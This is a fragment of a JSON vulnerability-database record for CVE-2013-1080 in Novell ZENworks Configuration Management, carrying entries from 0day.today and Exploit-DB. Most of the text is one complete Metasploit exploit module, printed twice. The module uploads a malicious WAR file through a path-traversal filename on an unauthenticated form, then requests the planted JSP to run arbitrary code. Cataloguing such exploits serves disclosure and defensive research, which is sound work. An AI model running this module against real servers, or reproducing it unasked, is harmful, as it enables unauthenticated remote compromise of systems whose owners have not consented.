"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-09T01:46:11", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a code execution flaw in Novell ZENworks Configuration Management 10 SP3 and 11 SP2. 
The vulnerability exists in the ZEnworks Control Center application, allowing an unauthenticated attacker to upload a malicious file outside of the TEMP directory and then make a second request that allows for arbitrary code execution. This Metasploit module has been tested successfully on Novell ZENworks Configuration Management 10 SP3 and 11 SP2 on Windows 2003 SP2 and SUSE Linux Enterprise Server 10 SP3.", "modified": "2013-04-02T00:00:00", "published": "2013-04-02T00:00:00", "id": "1337DAY-ID-20599", "href": "https://0day.today/exploit/description/20599", "type": "zdt", "title": "Novell ZENworks Configuration Management Remote Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Novell ZENworks Configuration Management Remote Execution',\r\n 'Description' => %q{\r\n This module exploits a code execution flaw in Novell ZENworks Configuration\r\n Management 10 SP3 and 11 SP2. The vulnerability exists in the ZEnworks Control\r\n Center application, allowing an unauthenticated attacker to upload a malicious file\r\n outside of the TEMP directory and then make a second request that allows for\r\n arbitrary code execution. 
This module has been tested successfully on Novell\r\n ZENworks Configuration Management 10 SP3 and 11 SP2 on Windows 2003 SP2 and SUSE\r\n Linux Enterprise Server 10 SP3.\r\n },\r\n 'Author' =>\r\n [\r\n 'James Burton', # Vulnerability discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1080' ],\r\n [ 'BID', '58668' ],\r\n [ 'OSVDB', '91627' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-049/' ],\r\n [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7011812' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Platform' => [ 'win', 'linux' ],\r\n 'Targets' =>\r\n [\r\n [ 'ZENworks Configuration Management 10 SP3 and 11 SP2 / Windows 2003 SP2',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win',\r\n 'Traversal' => '../webapps/'\r\n }\r\n ],\r\n [ 'ZENworks Configuration Management 10 SP3 and 11 SP2 / SUSE Linux Enterprise Server 10 SP3',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux',\r\n 'Traversal' => '../../opt/novell/zenworks/share/tomcat/webapps/'\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 1,\r\n 'DisclosureDate' => 'Mar 22 2013'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptBool.new('SSL', [true, 'Use SSL', true])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => \"/zenworks/jsp/fw/internal/Login.jsp\"\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /Novell ZENworks Control Center/\r\n return Exploit::CheckCode::Detected\r\n end\r\n\r\n return Exploit::CheckCode::Detected\r\n end\r\n\r\n def exploit\r\n\r\n # Generate the WAR containing the EXE containing the payload\r\n app_base = rand_text_alphanumeric(4+rand(4))\r\n jsp_name = rand_text_alphanumeric(8+rand(8))\r\n\r\n war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s\r\n\r\n print_status(\"Uploading #{war_data.length} bytes as #{app_base}.war ...\")\r\n\r\n # Rex::MIME::Message.new doesn't 
work fine with binary data, destroys \"\\x0d\" chars\r\n boundary = \"----#{rand_text_alpha(34)}\"\r\n data = \"--#{boundary}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"mainPage:_ctrl21a:FindFile:filePathTextBox\\\"; filename=\\\"#{target['Traversal']}#{app_base}.war\\\"\\r\\n\"\r\n data << \"Content-Type: application/octet-stream\\r\\n\\r\\n\"\r\n data << war_data\r\n data << \"\\r\\n\"\r\n data << \"--#{boundary}--\"\r\n\r\n res = send_request_cgi(\r\n {\r\n 'method' => 'POST',\r\n 'uri' => \"/zenworks/jsp/index.jsp?pageid=newDocumentWizard\",\r\n 'ctype' => \"multipart/form-data; boundary=#{boundary}\",\r\n 'data' => data\r\n })\r\n\r\n if res and res.code == 302\r\n print_status(\"Upload finished, waiting 20 seconds for payload deployment...\")\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"Failed to upload payload\")\r\n end\r\n\r\n # Wait to ensure the uploaded war is deployed\r\n select(nil, nil, nil, 20)\r\n\r\n print_status(\"Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...\")\r\n send_request_cgi({\r\n 'uri' => normalize_uri(app_base, \"#{jsp_name}.jsp\"),\r\n 'method' => 'GET',\r\n })\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20599"}], "exploitdb": [{"lastseen": "2016-02-03T00:18:53", "bulletinFamily": "exploit", "description": "Novell ZENworks Configuration Management Remote Execution. CVE-2013-1080. Remote exploits for multiple platform", "modified": "2013-04-08T00:00:00", "published": "2013-04-08T00:00:00", "id": "EDB-ID:24938", "href": "https://www.exploit-db.com/exploits/24938/", "type": "exploitdb", "title": "Novell ZENworks Configuration Management Remote Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Novell ZENworks Configuration Management Remote Execution',\r\n 'Description' => %q{\r\n This module exploits a code execution flaw in Novell ZENworks Configuration\r\n Management 10 SP3 and 11 SP2. The vulnerability exists in the ZEnworks Control\r\n Center application, allowing an unauthenticated attacker to upload a malicious file\r\n outside of the TEMP directory and then make a second request that allows for\r\n arbitrary code execution. This module has been tested successfully on Novell\r\n ZENworks Configuration Management 10 SP3 and 11 SP2 on Windows 2003 SP2 and SUSE\r\n Linux Enterprise Server 10 SP3.\r\n },\r\n 'Author' =>\r\n [\r\n 'James Burton', # Vulnerability discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1080' ],\r\n [ 'BID', '58668' ],\r\n [ 'OSVDB', '91627' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-049/' ],\r\n [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7011812' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Platform' => [ 'win', 'linux' ],\r\n 'Targets' =>\r\n [\r\n [ 'ZENworks Configuration Management 10 SP3 and 11 SP2 / Windows 2003 SP2',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win',\r\n 'Traversal' => '../webapps/'\r\n }\r\n ],\r\n [ 'ZENworks Configuration Management 10 SP3 and 11 SP2 / SUSE Linux Enterprise Server 10 SP3',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux',\r\n 'Traversal' => '../../opt/novell/zenworks/share/tomcat/webapps/'\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' 
=> 1,\r\n 'DisclosureDate' => 'Mar 22 2013'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptBool.new('SSL', [true, 'Use SSL', true])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => \"/zenworks/jsp/fw/internal/Login.jsp\"\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /Novell ZENworks Control Center/\r\n return Exploit::CheckCode::Detected\r\n end\r\n\r\n return Exploit::CheckCode::Detected\r\n end\r\n\r\n def exploit\r\n\r\n # Generate the WAR containing the EXE containing the payload\r\n app_base = rand_text_alphanumeric(4+rand(4))\r\n jsp_name = rand_text_alphanumeric(8+rand(8))\r\n\r\n war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s\r\n\r\n print_status(\"Uploading #{war_data.length} bytes as #{app_base}.war ...\")\r\n\r\n # Rex::MIME::Message.new doesn't work fine with binary data, destroys \"\\x0d\" chars\r\n boundary = \"----#{rand_text_alpha(34)}\"\r\n data = \"--#{boundary}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"mainPage:_ctrl21a:FindFile:filePathTextBox\\\"; filename=\\\"#{target['Traversal']}#{app_base}.war\\\"\\r\\n\"\r\n data << \"Content-Type: application/octet-stream\\r\\n\\r\\n\"\r\n data << war_data\r\n data << \"\\r\\n\"\r\n data << \"--#{boundary}--\"\r\n\r\n res = send_request_cgi(\r\n {\r\n 'method' => 'POST',\r\n 'uri' => \"/zenworks/jsp/index.jsp?pageid=newDocumentWizard\",\r\n 'ctype' => \"multipart/form-data; boundary=#{boundary}\",\r\n 'data' => data\r\n })\r\n\r\n if res and res.code == 302\r\n print_status(\"Upload finished, waiting 20 seconds for payload deployment...\")\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"Failed to upload payload\")\r\n end\r\n\r\n # Wait to ensure the uploaded war is deployed\r\n select(nil, nil, nil, 20)\r\n\r\n print_status(\"Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...\")\r\n send_request_cgi({\r\n 'uri' => normalize_uri(app_base, 
\"#{jsp_name}.jsp\"),\r\n 'method' => 'GET',\r\n })\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24938/"}]}